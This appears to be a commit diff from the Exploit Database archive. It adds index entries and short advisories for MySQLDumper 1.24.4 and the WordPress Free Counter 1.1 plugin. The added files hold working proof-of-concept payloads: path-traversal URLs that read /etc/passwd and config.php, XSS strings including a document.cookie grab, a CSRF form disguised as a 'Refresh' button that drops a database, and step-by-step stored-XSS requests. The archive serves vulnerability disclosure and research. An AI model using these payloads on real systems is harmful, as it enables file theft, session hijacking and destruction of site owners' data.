DB: 2015-05-28

9 new exploits

files.csv

@@ -78,7 +78,7 @@ id,file,description,date,author,platform,type,port
 77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80
 78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit (advanced version)",2003-08-11,Xpl017Elz,linux,remote,21
 79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0
-80,platforms/windows/remote/80.c,"Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
+80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
 81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0
 82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0
 83,platforms/windows/remote/83.html,"Microsoft Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0
@@ -13780,7 +13780,7 @@ id,file,description,date,author,platform,type,port
 15915,platforms/php/webapps/15915.py,"Concrete CMS 5.4.1.1 - XSS/Remote Code Execution Exploit",2011-01-05,mr_me,php,webapps,0
 15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary - (src .php) File Download",2010-12-30,"Yakir Wizman",windows,remote,0
 15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0
-15879,platforms/windows/shellcode/15879.txt,w32-speaking-shellcode,2010-12-31,Skylined,windows,shellcode,0
+15879,platforms/windows/shellcode/15879.txt,"w32 speaking shellcode",2010-12-31,Skylined,windows,shellcode,0
 15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0
 15886,platforms/php/webapps/15886.txt,"KLINK SQL Injection Vulnerability",2011-01-01,"Mauro Rossi and Andres Gomez",php,webapps,0
 15895,platforms/windows/local/15895.py,"CoolPlayer 2.18 - DEP Bypass",2011-01-02,blake,windows,local,0
@@ -26885,7 +26885,7 @@ id,file,description,date,author,platform,type,port
 30162,platforms/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous ",php,webapps,0
 30163,platforms/multiple/dos/30163.html,"Blue Coat Systems K9 Web Protection 32.36 - Remote Buffer Overflow Vulnerability",2007-06-08,"Dennis Rand",multiple,dos,0
 30164,platforms/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 Tk Parameter Cross-Site Scripting Vulnerability",2007-06-08,"Secunia Research",hardware,remote,0
-30165,platforms/asp/webapps/30165.txt,Ibrahim,2007-06-08,ertuqrul,asp,webapps,0
+30165,platforms/asp/webapps/30165.txt,"Ibrahim Ã?AKICI Okul Portal Haber_Oku.ASP - SQL Injection Vulnerability",2007-06-08,ertuqrul,asp,webapps,0
 30166,platforms/php/webapps/30166.txt,"WordPress 2.2 Request_URI Parameter Cross-Site Scripting Vulnerability",2007-06-08,zamolx3,php,webapps,0
 30167,platforms/hardware/dos/30167.txt,"Packeteer PacketShaper 7.x Web Interface Remote Denial of Service Vulnerability",2007-06-08,nnposter,hardware,dos,0
 30168,platforms/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System vBSupport.PHP SQL Injection Vulnerability",2007-06-09,rUnViRuS,php,webapps,0
@@ -33504,3 +33504,12 @@ id,file,description,date,author,platform,type,port
 37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 'id' Parameter SQL Injection Vulnerability",2012-04-28,eidelweiss,php,webapps,0
 37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross Site Scripting Vulnerability",2012-04-30,Am!r,php,webapps,0
 37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0
+37125,platforms/php/webapps/37125.txt,"MySQLDumper 1.24.4 restore.php filename Parameter XSS",2012-04-27,AkaStep,php,webapps,0
+37126,platforms/perl/webapps/37126.txt,"MySQLDumper 1.24.4 install.php language Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,perl,webapps,0
+37127,platforms/php/webapps/37127.txt,"MySQLDumper 1.24.4 install.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0
+37128,platforms/php/webapps/37128.txt,"MySQLDumper 1.24.4 sql.php Multiple Parameter XSS",2012-04-27,AkaStep,php,webapps,0
+37129,platforms/php/webapps/37129.txt,"MySQLDumper 1.24.4 filemanagement.php f Parameter Traversal Arbitrary File Access",2012-04-27,AkaStep,php,webapps,0
+37130,platforms/php/webapps/37130.txt,"MySQLDumper 1.24.4 Multiple Script Direct Request Information Disclosure",2012-04-27,AkaStep,php,webapps,0
+37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 main.php Multiple Function CSRF",2012-04-27,AkaStep,php,webapps,0
+37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 Stored XSS",2015-05-27,"Panagiotis Vagenas",php,webapps,80
+37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 index.php page Parameter XSS",2012-04-27,AkaStep,php,webapps,0

platforms/perl/webapps/37126.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53306/info
+ 
+MySQLDumper is prone to multiple security vulnerabilities, including:
+ 
+1. Multiple cross-site scripting vulnerabilities.
+2. A local file-include vulnerability.
+3. Multiple cross-site request-forgery vulnerabilities.
+4. Multiple information-disclosure vulnerabilities.
+5. A directory-traversal vulnerability.
+ 
+Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
+ 
+MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00

platforms/php/webapps/37125.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53306/info
+
+MySQLDumper is prone to multiple security vulnerabilities, including:
+
+1. Multiple cross-site scripting vulnerabilities.
+2. A local file-include vulnerability.
+3. Multiple cross-site request-forgery vulnerabilities.
+4. Multiple information-disclosure vulnerabilities.
+5. A directory-traversal vulnerability.
+
+Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
+
+MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/learn/cubemail/restore.php?filename=%3Cscript%3Ealert%281%29;%3C/script%3E

platforms/php/webapps/37127.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53306/info
+  
+MySQLDumper is prone to multiple security vulnerabilities, including:
+  
+1. Multiple cross-site scripting vulnerabilities.
+2. A local file-include vulnerability.
+3. Multiple cross-site request-forgery vulnerabilities.
+4. Multiple information-disclosure vulnerabilities.
+5. A directory-traversal vulnerability.
+  
+Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
+  
+MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/learn/cubemail/install.php?phase=8%3Cscript%3Ealert%281%29;%3C/script%3E&language=en&submit=Installation

platforms/php/webapps/37128.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/53306/info
+   
+MySQLDumper is prone to multiple security vulnerabilities, including:
+   
+1. Multiple cross-site scripting vulnerabilities.
+2. A local file-include vulnerability.
+3. Multiple cross-site request-forgery vulnerabilities.
+4. Multiple information-disclosure vulnerabilities.
+5. A directory-traversal vulnerability.
+   
+Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
+   
+MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/learn/cubemail/sql.php?db=0&dbid=1&tablename=%3Cscript%3Ealert%281%29;%3C/script%3E
+http://www.example.com/learn/cubemail/sql.php?db=0&dbid=%3Cscript%3Ealert%281%29;%3C/script%3E&tablename=1

platforms/php/webapps/37129.txt

@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/53306/info
+    
+MySQLDumper is prone to multiple security vulnerabilities, including:
+    
+1. Multiple cross-site scripting vulnerabilities.
+2. A local file-include vulnerability.
+3. Multiple cross-site request-forgery vulnerabilities.
+4. Multiple information-disclosure vulnerabilities.
+5. A directory-traversal vulnerability.
+    
+Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
+    
+MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../config.php
+http://www.example.com/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00

platforms/php/webapps/37130.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/53306/info
+     
+MySQLDumper is prone to multiple security vulnerabilities, including:
+     
+1. Multiple cross-site scripting vulnerabilities.
+2. A local file-include vulnerability.
+3. Multiple cross-site request-forgery vulnerabilities.
+4. Multiple information-disclosure vulnerabilities.
+5. A directory-traversal vulnerability.
+     
+Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
+     
+MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/learn/cubemail/restore.php
+http://www.example.com/learn/cubemail/dump.php
+http://www.example.com/learn/cubemail/refresh_dblist.php

platforms/php/webapps/37131.txt

@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/53306/info
+      
+MySQLDumper is prone to multiple security vulnerabilities, including:
+      
+1. Multiple cross-site scripting vulnerabilities.
+2. A local file-include vulnerability.
+3. Multiple cross-site request-forgery vulnerabilities.
+4. Multiple information-disclosure vulnerabilities.
+5. A directory-traversal vulnerability.
+      
+Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
+      
+MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 
+
+<img src="http://www.example.com/tld/meonyourpc.PNG" heigth="250" width="300" />
+<form name="hackit" id="hackit" action="http://www.example.com/learn/cubemail/main.php?action=db&dbid=1" method="post">
+<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
+<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">
+</form>

platforms/php/webapps/37132.txt

@@ -0,0 +1,41 @@
+# Exploit Title: WordPress Free Counter Plugin [Stored XSS]
+# Date: 2015/05/25
+# Exploit Author: Panagiotis Vagenas
+# Contact: https://twitter.com/panVagenas
+# Vendor Homepage: http://www.free-counter.org
+# Software Link: https://wordpress.org/plugins/free-counter/
+# Version: 1.1
+# Tested on: WordPress 4.2.2
+# Category: webapps
+# CVE: CVE-2015-4084
+
+1. Description
+
+Any authenticated or non-authenticated user can perform a stored XSS 
+attack simply by exploiting wp_ajax_nopriv_check_stat action.
+Plugin uses a widget to display website's visits, so any page that 
+contains this widget will also load the malicious JS code.
+
+2. Proof of Concept
+
+* Send a post request to `http://www.free-counter.org/Api.php` in order 
+to reveal the counter id of the vulnerable site. The POST data must 
+contain the following vars: 
+`action=create_new_counter&site_url=http%3A%2f%my.vulnerable.website.com`
+* As a response we get a serialized indexed array. The value that we 
+need to know is the 'counter_id'.
+* Send a post request to 
+`http://my.vulnerable.website.com/wp-admin/admin-ajax.php` with data: 
+`action=check_stat&id_counter=<counter_id from step 
+2>&value_=<script>alert(1)</script>`
+* Visit a page of the infected website that displays plugin's widget.
+
+Note that the plugin uses the update_option function to store the 
+$_POST['value_'] contents to DB so any code inserted there will be 
+escaped. Even though a malicious user can omit the quotes in the src 
+attr of the script tag. Most modern browsers will treat the tag as they 
+were there.
+
+3. Solution
+
+No official solution yet exists.

platforms/php/webapps/37133.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53306/info
+       
+MySQLDumper is prone to multiple security vulnerabilities, including:
+       
+1. Multiple cross-site scripting vulnerabilities.
+2. A local file-include vulnerability.
+3. Multiple cross-site request-forgery vulnerabilities.
+4. Multiple information-disclosure vulnerabilities.
+5. A directory-traversal vulnerability.
+       
+Exploiting these vulnerabilities may allow an attacker to harvest sensitive information, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, to view and execute local files within the context of the webserver process and to retrieve arbitrary files in the context of the affected application. This may aid in launching further attacks.
+       
+MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/learn/cubemail/index.php?page=javascript:alert%28document.cookie%29;

platforms/windows/remote/80.c

@@ -194,6 +194,6 @@ snd=send(sock, exploit_code, strlen(exploit_code) , 0);
 Sleep(2000); 
 closesocket(sock); 
 return 0; 
-}
-
-// milw0rm.com [2003-08-13]
+}
+
+// milw0rm.com [2003-08-13]